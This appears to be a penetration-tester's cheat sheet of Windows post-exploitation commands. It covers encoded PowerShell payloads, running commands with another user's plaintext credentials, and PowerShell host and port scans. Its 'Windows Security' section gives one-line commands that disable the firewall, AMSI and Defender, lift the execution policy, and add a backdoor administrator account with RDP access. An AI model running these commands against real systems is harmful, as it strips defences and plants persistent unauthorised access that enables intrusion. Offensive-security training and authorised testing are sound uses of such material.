#
Windows Tricks
#
PowerShell encoded base64
Create a base64-encoded payload to avoid bad characters; `-enc` expects the command as UTF-16LE before it is base64-encoded, which is why the pipeline below converts with `iconv -t utf-16le` first.
# Create the command to PowerShell execute
$ echo -n 'ping -n 2 10.10.14.2' | iconv -t utf-16le | base64 -w 0
cABpAG4AZwAgAC0AbgAgADIAIAAxADAALgAxADAALgAxADQALgAyAA==
# Run PowerShell with Encoded flag
Payload: cmd /c powershell -nop -enc cABpAG4AZwAgAC0AbgAgADIAIAAxADAALgAxADAALgAxADQALgAyAA==
#
Run command as User (with creds)
$pass = ConvertTo-SecureString "aliceishere" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("disco\Alice", $pass)
Invoke-Command -ComputerName disco -Credential $cred -ScriptBlock {whoami}
#
List running processes with their command-line arguments
WMIC path win32_process get Caption,Processid,Commandline
#
Scan for hosts and open ports in a subnet
# Scan for Hosts in Subnet
PS > 1..254 | ForEach-Object {Test-Connection -ComputerName "172.16.2.$_" -Count 1 -ErrorAction SilentlyContinue}
# Scan for open Ports
PS > 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("172.16.2.101",$_)) "Port $_ is open!"} 2>$null
#
PowerShell
# PowerShell Directory
c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
# Fix the PATH environment variable
set PATH=%SystemRoot%\system32;%SystemRoot%;
#
Search for files
Get-Childitem -Path C:\ -Include *filetosearch* -Recurse -ErrorAction SilentlyContinue
#
Windows Security
#
Disable Firewall
NetSh Advfirewall set allprofiles state off
#
Disable AMSI
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
#
Disable Defender
sc stop WinDefend
#
Execution Policy
Set-ExecutionPolicy Unrestricted
Set-ExecutionPolicy Unrestricted -Scope CurrentUser
#
Add an RDP user
net user hacker hacker123 /add
net localgroup Administrators hacker /add
net localgroup "Remote Desktop Users" hacker /ADD